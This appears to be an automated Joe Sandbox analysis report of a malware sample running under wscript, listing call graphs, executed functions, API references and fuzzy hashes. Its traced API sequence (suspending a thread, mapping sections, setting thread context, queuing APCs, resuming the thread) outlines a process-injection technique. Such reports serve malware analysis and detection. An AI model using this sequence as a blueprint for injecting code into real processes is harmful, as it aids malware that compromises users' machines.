2a0b0e0 113855->113857 113869 2a19c60 LdrLoadDll 113855->113869 113857->113487 113859 2a1af30 LdrLoadDll 113858->113859 113860 2a0f1bb 113859->113860 113860->113495 113861 2a1a7a0 113860->113861 113862 2a1af30 LdrLoadDll 113861->113862 113863 2a1a7bf LookupPrivilegeValueW 113862->113863 113863->113491 113865 2a1af30 LdrLoadDll 113864->113865 113866 2a1a24c 113865->113866 113870 4ad2ea0 LdrInitializeThunk 113866->113870 113867 2a1a26b 113867->113492 113869->113857 113870->113867 113872 2a0b1f0 113871->113872 113873 2a0b040 LdrLoadDll 113872->113873 113874 2a0b204 113873->113874 113874->113427 113876 2a0af34 113875->113876 113948 2a19c60 LdrLoadDll 113876->113948 113878 2a0af6e 113878->113429 113880 2a0f3ac 113879->113880 113881 2a0b1c0 LdrLoadDll 113880->113881 113882 2a0f3be 113881->113882 113949 2a0f290 113882->113949 113885 2a0f3f1 113888 2a0f402 113885->113888 113890 2a1a460 2 API calls 113885->113890 113886 2a0f3d9 113887 2a0f3e4 113886->113887 113889 2a1a460 2 API calls 113886->113889 113887->113432 113888->113432 113889->113887 113890->113888 113892 2a0f43c 113891->113892 113968 2a0b2b0 113892->113968 113894 2a0f44e 113895 2a0f290 3 API calls 113894->113895 113896 2a0f45f 113895->113896 113897 2a0f481 113896->113897 113898 2a0f469 113896->113898 113899 2a0f492 113897->113899 113902 2a1a460 2 API calls 113897->113902 113900 2a0f474 113898->113900 113901 2a1a460 2 API calls 113898->113901 113899->113434 113900->113434 113901->113900 113902->113899 113904 2a0caa6 113903->113904 113905 2a0cab0 113903->113905 113904->113443 113906 2a0af10 LdrLoadDll 113905->113906 113907 2a0cb4e 113906->113907 113908 2a0cb74 113907->113908 113909 2a0b040 LdrLoadDll 113907->113909 113908->113443 113910 2a0cb90 113909->113910 113911 2a14a50 8 API calls 113910->113911 113912 2a0cbe5 113911->113912 113912->113443 113914 2a0d646 113913->113914 113915 2a0b040 LdrLoadDll 113914->113915 113916 2a0d65a 113915->113916 113972 2a0d310 113916->113972 113918 2a0908b 113919 2a0cc00 113918->113919 113920 2a0cc26 113919->113920 113921 2a0b040 LdrLoadDll 113920->113921 113922 2a0cca9 113920->113922 113921->113922 113923 2a0b040 LdrLoadDll 113922->113923 113924 2a0cd16 113923->113924 113925 2a0af10 LdrLoadDll 113924->113925 113926 2a0cd7f 113925->113926 113927 2a0b040 LdrLoadDll 113926->113927 113928 2a0ce2f 113927->113928 113928->113456 114001 2a0f6d0 113929->114001 113931 2a08f25 113931->113412 113932 2a08d14 113932->113931 114006 2a143a0 113932->114006 113934 2a08d70 113934->113931 114009 2a08ab0 113934->114009 113937 2a1cf00 2 API calls 113938 2a08db2 113937->113938 113939 2a1d030 3 API calls 113938->113939 113944 2a08dc7 113939->113944 113940 2a07ea0 4 API calls 113940->113944 113943 2a0c7b0 18 API calls 113943->113944 113944->113931 113944->113940 113944->113943 113945 2a08160 2 API calls 113944->113945 114014 2a0f670 113944->114014 114018 2a0f080 21 API calls 113944->114018 113945->113944 113946->113435 113947->113461 113948->113878 113950 2a0f360 113949->113950 113951 2a0f2aa 113949->113951 113950->113885 113950->113886 113952 2a0b040 LdrLoadDll 113951->113952 113953 2a0f2cc 113952->113953 113959 2a19f10 113953->113959 113955 2a0f30e 113962 2a19f50 113955->113962 113958 2a1a460 2 API calls 113958->113950 113960 2a1af30 LdrLoadDll 113959->113960 113961 2a19f2c 113960->113961 113961->113955 113963 2a19f6c 113962->113963 113964 2a1af30 LdrLoadDll 113962->113964 113967 4ad35c0 LdrInitializeThunk 113963->113967 113964->113963 113965 2a0f354 113965->113958 113967->113965 113969 2a0b2d7 113968->113969 113970 2a0b040 LdrLoadDll 113969->113970 113971 2a0b313 113970->113971 113971->113894 113973 2a0d327 113972->113973 113981 2a0f710 113973->113981 113977 2a0d39b 113978 2a0d3a2 113977->113978 113992 2a1a270 LdrLoadDll 113977->113992 113978->113918 113980 2a0d3b5 113980->113918 113982 2a0f735 113981->113982 113993 2a081a0 113982->113993 113984 2a0d36f 113989 2a1a6b0 113984->113989 113985 2a14a50 8 API calls 113987 2a0f759 113985->113987 113987->113984 113987->113985 113988 2a1bd90 2 API calls 113987->113988 114000 2a0f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 113987->114000 113988->113987 113990 2a1af30 LdrLoadDll 113989->113990 113991 2a1a6cf CreateProcessInternalW 113990->113991 113991->113977 113992->113980 113994 2a0829f 113993->113994 113995 2a081b5 113993->113995 113994->113987 113995->113994 113996 2a14a50 8 API calls 113995->113996 113998 2a08222 113996->113998 113997 2a08249 113997->113987 113998->113997 113999 2a1bd90 2 API calls 113998->113999 113999->113997 114000->113987 114002 2a14e50 LdrLoadDll 114001->114002 114003 2a0f6ef 114002->114003 114004 2a0f6f6 SetErrorMode 114003->114004 114005 2a0f6fd 114003->114005 114004->114005 114005->113932 114019 2a0f4a0 114006->114019 114008 2a143c6 114008->113934 114010 2a1bd10 2 API calls 114009->114010 114013 2a08ad5 114010->114013 114011 2a08cea 114011->113937 114013->114011 114039 2a19850 114013->114039 114015 2a0f683 114014->114015 114087 2a19e60 114015->114087 114018->113944 114020 2a0f4bd 114019->114020 114026 2a19f90 114020->114026 114023 2a0f505 114023->114008 114027 2a19fa6 114026->114027 114028 2a1af30 LdrLoadDll 114027->114028 114029 2a19fac 114028->114029 114037 4ad2f30 LdrInitializeThunk 114029->114037 114030 2a0f4fe 114030->114023 114032 2a19fe0 114030->114032 114033 2a1af30 LdrLoadDll 114032->114033 114034 2a19ffc 114033->114034 114038 4ad2d10 LdrInitializeThunk 114034->114038 114035 2a0f52e 114035->114008 114037->114030 114038->114035 114040 2a1bf60 2 API calls 114039->114040 114041 2a19867 114040->114041 114060 2a09310 114041->114060 114043 2a19882 114044 2a198c0 114043->114044 114045 2a198a9 114043->114045 114048 2a1bd10 2 API calls 114044->114048 114046 2a1bd90 2 API calls 114045->114046 114047 2a198b6 114046->114047 114047->114011 114049 2a198fa 114048->114049 114050 2a1bd10 2 API calls 114049->114050 114051 2a19913 114050->114051 114057 2a19bb4 114051->114057 114066 2a1bd50 LdrLoadDll 114051->114066 114053 2a19b99 114054 2a19ba0 114053->114054 114053->114057 114055 2a1bd90 2 API calls 114054->114055 114056 2a19baa 114055->114056 114056->114011 114058 2a1bd90 2 API calls 114057->114058 114059 2a19c09 114058->114059 114059->114011 114061 2a09335 114060->114061 114062 2a0acf0 LdrLoadDll 114061->114062 114063 2a09368 114062->114063 114065 2a0938d 114063->114065 114067 2a0cf20 114063->114067 114065->114043 114066->114053 114068 2a0cf4c 114067->114068 114069 2a1a1b0 LdrLoadDll 114068->114069 114070 2a0cf65 114069->114070 114071 2a0cf6c 114070->114071 114078 2a1a1f0 114070->114078 114071->114065 114075 2a0cfa7 114076 2a1a460 2 API calls 114075->114076 114077 2a0cfca 114076->114077 114077->114065 114079 2a1a20c 114078->114079 114080 2a1af30 LdrLoadDll 114078->114080 114086 4ad2ca0 LdrInitializeThunk 114079->114086 114080->114079 114081 2a0cf8f 114081->114071 114083 2a1a7e0 114081->114083 114084 2a1af30 LdrLoadDll 114083->114084 114085 2a1a7ff 114084->114085 114085->114075 114086->114081 114088 2a1af30 LdrLoadDll 114087->114088 114089 2a19e7c 114088->114089 114092 4ad2dd0 LdrInitializeThunk 114089->114092 114090 2a0f6ae 114090->113944 114092->114090 114095 4ad2ad0 LdrInitializeThunk 114097 49acb84 114100 49aa042 114097->114100 114099 49acba5 114101 49aa06b 114100->114101 114102 49aa182 NtQueryInformationProcess 114101->114102 114117 49aa56c 114101->114117 114104 49aa1ba 114102->114104 114103 49aa1ef 114103->114099 114104->114103 114105 49aa2db 114104->114105 114106 49aa290 114104->114106 114107 49aa2fc NtSuspendThread 114105->114107 114129 49a9de2 NtCreateSection NtMapViewOfSection NtClose 114106->114129 114109 49aa30d 114107->114109 114111 49aa331 114107->114111 114109->114099 114110 49aa2cf 114110->114099 114114 49aa412 114111->114114 114120 49a9bb2 114111->114120 114113 49aa531 114116 49aa552 NtResumeThread 114113->114116 114114->114113 114115 49aa4a6 NtSetContextThread 114114->114115 114119 49aa4bd 114115->114119 114116->114117 114117->114099 114118 49aa51c NtQueueApcThread 114118->114113 114119->114113 114119->114118 114121 49a9bf7 114120->114121 114122 49a9c66 NtCreateSection 114121->114122 114123 49a9d4e 114122->114123 114124 49a9ca0 114122->114124 114123->114114 114125 49a9cc1 NtMapViewOfSection 114124->114125 114125->114123 114126 49a9d0c 114125->114126 114126->114123 114127 49a9d88 114126->114127 114128 49a9dc5 NtClose 114127->114128 114128->114114 114129->114110

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 049AA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 049AA19F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 1778838933-4108050209
                                                                                                                                                                                                                      • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                                                                      • Instruction ID: bdd50d13fd7390d4184de167f8ba89e236d7aeb72961063c3faa6a56caa5564d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71F14174918A4C8FDBA5EF68C894AEEB7E1FF98304F40462AD44ED7650DF34A641CB81
                                                                                                                                                                                                                      Function 049A9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 207 49a9baf-49a9bef 208 49a9bf7-49a9bfe 207->208 209 49a9bf2 call 49a9102 207->209 210 49a9c0c-49a9c9a call 49ab942 * 2 NtCreateSection 208->210 211 49a9c00 208->211 209->208 217 49a9d5a-49a9d68 210->217 218 49a9ca0-49a9d0a call 49ab942 NtMapViewOfSection 210->218 212 49a9c02-49a9c0a 211->212 212->210 212->212 221 49a9d0c-49a9d4c 218->221 222 49a9d52 218->222 224 49a9d69-49a9d6b 221->224 225 49a9d4e-49a9d4f 221->225 222->217 226 49a9d88-49a9ddc call 49acd62 NtClose 224->226 227 49a9d6d-49a9d72 224->227 225->222 228 49a9d74-49a9d86 call 49a9172 227->228 228->226
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Section$CloseCreateView
                                                                                                                                                                                                                      • String ID: @$@
                                                                                                                                                                                                                      • API String ID: 1133238012-149943524
                                                                                                                                                                                                                      • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                                                                      • Instruction ID: 6d13c96c52a1f7e4f799a4c0bdccd907ca4e217c63256a5b7604676c7978ae1c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98617170518B488FDB58EF68D8856AABBE0FF98314F50062EE58AC3651DF35E441CB86
                                                                                                                                                                                                                      Function 049A9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 266 49a9bb2-49a9bfe call 49a9102 269 49a9c0c-49a9c9a call 49ab942 * 2 NtCreateSection 266->269 270 49a9c00 266->270 276 49a9d5a-49a9d68 269->276 277 49a9ca0-49a9d0a call 49ab942 NtMapViewOfSection 269->277 271 49a9c02-49a9c0a 270->271 271->269 271->271 280 49a9d0c-49a9d4c 277->280 281 49a9d52 277->281 283 49a9d69-49a9d6b 280->283 284 49a9d4e-49a9d4f 280->284 281->276 285 49a9d88-49a9ddc call 49acd62 NtClose 283->285 286 49a9d6d-49a9d72 283->286 284->281 287 49a9d74-49a9d86 call 49a9172 286->287 287->285
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Section$CreateView
                                                                                                                                                                                                                      • String ID: @$@
                                                                                                                                                                                                                      • API String ID: 1585966358-149943524
                                                                                                                                                                                                                      • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                                                      • Instruction ID: 60c586ff7f798482dce1309f0f659badb24995ffd7e70995fae691244b214319
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35515FB0618B088FD758DF18D8956AABBE0FB98314F50062EF58ED3651DF35E481CB86
                                                                                                                                                                                                                      Function 049AA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 049AA19F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588686644.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_49a0000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                      • API String ID: 1778838933-4108050209
                                                                                                                                                                                                                      • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                                                      • Instruction ID: 4397ea8a0cec714479c25c45d5d220df961099df720d3f35fdedc4c9ed7acc70
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5512E70914A8C8FDB69EF68C8946EEB7F4FB98305F40462ED44AD7250DF309645CB41
                                                                                                                                                                                                                      Function 02A1A2EA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 542 2a1a2ea-2a1a2ee 543 2a1a2f0-2a1a329 call 2a1af30 542->543 544 2a1a338-2a1a381 call 2a1af30 NtCreateFile 542->544
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1A37D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                                                                                      • Opcode ID: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
                                                                                                                                                                                                                      • Instruction ID: f835a02893075112cb502e43ad78d72380c3869a27569ed88239a913d37146bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C811D7B6215249ABCB08DF98DC85DEB77ADAF8C314F058649FA4DA7241D630E811CBA4
                                                                                                                                                                                                                      Function 02A1A32A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 550 2a1a32a-2a1a346 551 2a1a34c-2a1a381 NtCreateFile 550->551 552 2a1a347 call 2a1af30 550->552 552->551
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1A37D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                                                                                      • Opcode ID: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
                                                                                                                                                                                                                      • Instruction ID: 4cec1df7c0998646ffb0cd12aecf3f3d1c0d2834e238a21c24f5bfefb0b68cff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF01B6B2251108AFCB08CF88DC94EEB77ADAF8C754F558248FA1D97245D630E851CBA4
                                                                                                                                                                                                                      Function 02A1A330 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 553 2a1a330-2a1a346 554 2a1a34c-2a1a381 NtCreateFile 553->554 555 2a1a347 call 2a1af30 553->555 555->554
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02A14BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A14BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1A37D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                      • Instruction ID: 59d79da884170f7458ba3fe92914c4c5392d8942ae9cb4e697b498b672b6bb5c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0B2B2211208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                                                                                                                                                                      Function 02A1A3E0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtReadFile.NTDLL(02A14D72,5EB65239,FFFFFFFF,02A14A31,?,?,02A14D72,?,02A14A31,FFFFFFFF,5EB65239,02A14D72,?,00000000), ref: 02A1A425
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                      • Instruction ID: 8e8751fd3d2cd755eb0ebb30f1ccf71b5dda9535ccbd87beea3d0033eb6e24b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FF0BDB2210108AFCB14DF89DC80DEB77ADEF8C754F158249BE1D97241D630E811CBA4
                                                                                                                                                                                                                      Function 02A1A3DA Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtReadFile.NTDLL(02A14D72,5EB65239,FFFFFFFF,02A14A31,?,?,02A14D72,?,02A14A31,FFFFFFFF,5EB65239,02A14D72,?,00000000), ref: 02A1A425
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                                                      • Instruction ID: d7d73081238f9ac9984501ba988956c7dbffff69ae43b66fa4a917765682a61e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F01DB2210148ABCB09DF98D890CEB7BADAF8C314B15869DFD0C97216C634E855CBA0
                                                                                                                                                                                                                      Function 02A1A50A Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A02D11,00002000,00003000,00000004), ref: 02A1A549
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                                                                                      • Opcode ID: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
                                                                                                                                                                                                                      • Instruction ID: dbb6ed84c4c4eeb36d5a78b6c11d9cd49a4157999821492d864b8e2b56191346
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55F05EB6210104AFDB14CF88CC80EE77B69AF8C314F158549FE489B241C630E811CFA0
                                                                                                                                                                                                                      Function 02A1A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A02D11,00002000,00003000,00000004), ref: 02A1A549
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                                      • Instruction ID: 0f3945160fa33db1bdf350e1959fcde9abd3b2d7802f35035ad0b2f2d0ff0551
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F015B2210208ABCB18DF89CC80EAB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                                                      Function 02A1A45E Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtClose.NTDLL(02A14D50,?,?,02A14D50,00000000,FFFFFFFF), ref: 02A1A485
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                      • Opcode ID: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
                                                                                                                                                                                                                      • Instruction ID: 2ecac67c8e5c8882dc5714b2a4937746a595835e0b1e0e407b206ac0942efbfe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFE0C272200204BFD720EFA4CC44EDB7B68EF44360F104459F90EAB242C530E510CB90
                                                                                                                                                                                                                      Function 02A1A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtClose.NTDLL(02A14D50,?,?,02A14D50,00000000,FFFFFFFF), ref: 02A1A485
                                                                                                                                                                                                                      Memory Dump Source
